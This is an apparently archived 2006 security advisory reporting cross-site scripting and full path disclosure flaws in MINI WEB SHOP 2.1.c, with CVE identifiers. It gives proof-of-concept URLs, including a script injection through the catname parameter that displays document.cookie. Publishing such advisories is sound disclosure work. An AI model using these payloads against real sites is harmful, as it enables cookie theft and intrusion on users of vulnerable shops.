Multiple Bugs in MINI WEB SHOP

2006.12.29

Credit: Linux_Drox ( Qptan )

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-6735 | CVE-2006-6734

CWE: N/A

Hello
Vulnerable : MINI WEB SHOP
Version: 2.1.c
web : http://ObieWebsite.SourceForge.net
I Found some bugs ( XSS & Full Path Disclosure ) in MINI WEB SHOP
XSS :
http://example.com/miniwebshop/modules/viewcategory.php?catname='><scrip
t>alert(document.cookie)</script>
Full Path Disclosure :
http://example.com/miniwebshop/modules/viewcategory.php?catname=[anythin
g]
Discovery by Linux_Drox ( Qptan )
Linux_Drox (at) Saudi.Net (dot) Sa [email concealed]
www.LeZr.Com/vb
Best Regards ,,,

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Multiple Bugs in MINI WEB SHOP

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.